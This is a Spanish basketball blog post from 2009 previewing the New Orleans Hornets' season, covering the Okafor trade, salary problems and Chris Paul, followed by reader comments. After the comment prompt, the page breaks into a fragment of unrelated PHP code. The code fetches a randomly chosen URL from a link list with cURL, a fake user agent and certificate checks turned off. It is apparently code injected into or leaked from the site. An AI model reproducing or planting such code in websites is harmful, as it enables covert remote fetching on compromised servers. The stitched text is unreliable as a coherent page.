New Orleans Hornets: (Ex-)Candidatos a todo

08 de October de 2009 por TheDeerHunter

No hace tanto que los sorprendentes Hornets ponían en jaque a los entonces campeones Spurs en la semifinal de conferencia del Wild Wild West post Gasol-trade. En aquel entonces Chris Paul, con tan sólo 23 añitos, se erigía como el mejor base de la liga y discutía con fuerza el MVP que terminó apuntándose Kobe Bryant. Byron Scott era el técnico de moda y el Arena de Nueva Orleans un fortín que obligaba a hincar la rodilla a los mejores equipos de la liga. Bien parecía que se iban a comer el mundo… Y el año pasado, por estas fechas, les dábamos como posibles finalistas de conferencia y como una de las 3 franquicias del oeste con mejores expectativas a corto-medio plazo. Pronto quedó claro que nos equivocábamos…

En una plantilla a priori bastante corta, resultó dramático el bajón experimentado por los dos teóricos alas titulares. Se veía venir el de Morris Peterson, pero lo de Stojakovic terminó rozando lo penoso. Casi 20 kilos colocados para los próximos 2 años que de por sí demuestran que las expectativas no eran tan buenas, peor aún con la que está cayendo en términos económicos en esta franquicia especialmente, por lo que se comenta.

A la fiesta pronto se iba a unir Chandler con problemas casi todo el año (y porqué no decirlo, con otro contrato para hacer temblar a más de un general manager) agravándose con el infructuoso “traspasus interruptus” a raíz de unos informes médicos de infausto recuerdo para todas las partes. El asunto relativo a un jugador tan importante terminó por emponzoñar el propio ambiente provocando todo tipo de roces entre los jugadores. La temporada más decepcionante y mediocre terminó de la peor forma posible. Sufriendo para clasificarse con más pena que gloria a postemporada y llevándose un baño en primera ronda a manos de los Nuggets, con Billups destrozando a un Chris Paul agotado física y mentalmente. Lo que mal empieza…

La principal novedad este curso, a modo de intentar evitar la depresión profunda, ha sido el trade Okafor por Chandler. En principio no se trata de una mala incorporación teniendo en cuenta las características de ambos y la necesidad de insuflar aire fresco a la plantilla. Se trata de un jugador objetivamente sólido, un 15-10 a poco que se ponga y con mayor potencial que Chandler del que ni siquiera podemos decir que desentone defensivamente hablando. Puede que no sea superior a D.Howard como se aventuraba antes del draft de 2004 pero desde luego tiene todo para hacerlo bien en la franquicia del avispón. Su problema, a priori, podría ser un tanto externo. ¿Supondrá la figura de Okafor el salto cualitativo que el equipo necesita, descontando todo lo que aportaba Chandler en un rol diseñado a su medida? No va a ser fácil. Su problema es que pretenden que sea el revulsivo de una plantilla mal parida, corta, descompensada, moribunda. Formará un triángulo a tener en cuenta con David West y Chris Paul, pero más allá de estos 3 mosqueteros apenas hay nada.

No hay mucho margen de maniobra. Los 20 kilos por dos años entre Stojakovic (el segundo que más cobra del equipo) y Peterson son incolocables este año. Tres cuartos de lo mismo con respecto a los 6 millones de Posey, y añadiendo 3 más entre Devin Brown y Julian Wright. Tienen un juego de alas de 30 millones de dólares invertidos en gente que no pasarían de ser reservas en ningún equipo con aspiraciones que se precie. Eso es lo que hay, a no ser que Marcus Thornton, elegido en 2ª ronda, se destape como un jugador de impacto inminente. El drama del perímetro en este equipo es tal que lograron hacer bueno a Rasual Butler el año pasado tras una trayectoria bastante gris hasta la fecha pero ni siquiera han sido capaces de retenerlo. Un detalle más en favor de la teoría de los problemas económicos que les desangran. Y ahí está precisamente el gran desequilibrio que padecen y que les ata de pies y manos para recuperar esas altas expectativas que tenían hasta hace bien poco porque en el resto de posiciones sí están preparados para afrontarlas. Volvemos a los 3 mosqueteros que decíamos antes.

David West formará con Okafor un juego interior titular de primer nivel. No sabemos si se sentirá tan blindado defensivamente como con Chandler, pero ofensivamente sí estará algo más desahogado. El año pasado jugó mejor que nunca y no esperamos que éste sea distinto. Hilton Armstrong y Darius Songaila les pueden dar sus 15 buenos minutos de descanso y Ike Diogu y Sean Marks se repartirán lo poco que quede.

Finalmente llegamos a la gran estrella de este equipo. Chris Paul deberá volverse a multiplicar para liderar a sus compañeros a los Playoffs. Es uno de esos que puede hacerlo. Su mera presencia garantiza que, como mínimo, se luchará por entrar en postemporada independientemente de lo que haya a su alrededor. CP3 volverá a irse a números de marciano y Bobby Brown, junto al primera ronda Darren Collison procurarán que el crack no llegue tan sumamente reventado a la cita decisiva.

Suenan campanas de que ya se está empezando a cansar de un rol tan exigente, igual que algunos se están empezando a cansar del técnico Byron Scott. Como no puede ser de otra manera será su cabeza la primera en cortarse si el equipo no recupera la senda del éxito. Muy tranquilo no debe estar.

Quinteto inicial: Chris Paul, James Posey, Pedja Stojakovic, David West, Emeka Okafor

6º Hombre: Darius Songaila

Pronósticos: Luchando por la 8ª plaza del Oeste.

Comenta

5 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues yo creo que Stoja no saldra de titular y me decanto más por un Mo Pete/Posey – J. Wright en las alas. Pedja ya no esta para estos trotes y desde la franquicia le van a dosificar muy mucho. Dificilmente pasara de los 25-30 minutos por partido.
    La verdad es q es una lastima ver como ha acabado la franquicia despues del increible futuro q se le presentaba. Aguantara Paul otro año más como este?

      Citar

  2. TheDeerHunter dice:
    #2

    Me pasa lo mismo que con los Wolves… ni puñetera idea de quien saldrá de “titular”.
    Hoy ha salido Peterson (como el año pasado) y ha jugado no llega a un cuarto de hora (como el año pasado) Yo hubiera apostado porque le iban a jubilar ya al pobre de ser titular

      Citar

  3. NBA LAKERS BLOG dice:
    #3

    La verdad no los veo TAN mal… pero si, de arriba del 5to puesto no pasan… Hay que ver qué clase de química toma el equipo ahora con Okafor (recordemos que los últimos tiempos de Chandler dejaban mucho qué desear, y eran uno de los máximos problemas del equipo de Byron Scott).

    Buen trabajo 😉

    Te espero en mi blog de los Lakers!

    Un abrazo!

    –NM–

      Citar

  4. Jabho dice:
    #4

    No son un mal equipo y Julian Wright podría ser una sorpresa agradable de alero. El juego interior es sólido y CP3 es el mejor base de la liga. Dirigidos por Scott, como apuntáis si la química es buena será un equipo muy duro nuevamente

      Citar

  5. pablo :D dice:
    #5

    yo pienso q estan pasando por un momento de transicion i todos se tienen q hacer al equipo… emeka se ha adaptado muy bien pero chris paul( mejor base de la NBA sin lugar a dudas…) está ahora mismo como estaba kobe hace un par de años cuando no estaba gasol…
    necesita mas apoyo i yo pienso q a los hornets no le falta equipo solo q tienen q volver a tener la mentalidad de hace dos años cuando dieron el pelotazo ganando a los spurs.
    Mi equipo preferido de la NBA porq nada mas entrar paul a la liga supe q era de otro mundo y no me equivocaba esa forma de jugar q siempre lo hace bien y aunq tenga bajones hace mejores a sus compañeros…
    la clave está en la confianza de unos con otros i ese espiritu de victoria q tenian hace año i medio…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>